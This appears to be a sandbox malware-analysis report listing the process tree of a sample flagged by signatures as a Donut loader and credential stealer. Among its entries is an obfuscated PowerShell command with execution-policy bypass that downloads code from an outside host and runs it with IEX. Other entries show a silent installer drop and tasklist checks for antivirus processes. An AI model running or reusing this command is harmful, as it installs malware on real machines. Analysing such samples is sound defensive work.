                                                                                                                                                                                                                                                            File size:74'868'247 bytes
                                                                                                                                                                                                                                                            MD5 hash:956E50E278ACBF39DFCA43E8BA78F112
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                            Start time:12:53:25
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a
                                                                                                                                                                                                                                                            Imagebase:0xf70000
                                                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:12:53:25
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                            Start time:12:53:33
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe"
                                                                                                                                                                                                                                                            Imagebase:0xbf0000
                                                                                                                                                                                                                                                            File size:8'767'044 bytes
                                                                                                                                                                                                                                                            MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 74%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:12:53:35
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$2042C,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe"
                                                                                                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                                                                                                            File size:3'367'424 bytes
                                                                                                                                                                                                                                                            MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                                            Start time:12:53:36
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT
                                                                                                                                                                                                                                                            Imagebase:0xbf0000
                                                                                                                                                                                                                                                            File size:8'767'044 bytes
                                                                                                                                                                                                                                                            MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                                            Start time:12:53:37
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$60272,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT
                                                                                                                                                                                                                                                            Imagebase:0x860000
                                                                                                                                                                                                                                                            File size:3'367'424 bytes
                                                                                                                                                                                                                                                            MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                            Start time:12:54:05
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"timeout" 9
                                                                                                                                                                                                                                                            Imagebase:0x7ff787500000
                                                                                                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                            Start time:12:54:05
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff650360000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff74ef70000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "wrsa.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff685650000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff650360000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff74ef70000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "opssvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff685650000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff650360000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff74ef70000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                                            Start time:12:54:14
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "avastui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff685650000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff650360000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff74ef70000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "avgui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff685650000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff650360000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff74ef70000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff685650000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff650360000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff74ef70000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff685650000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

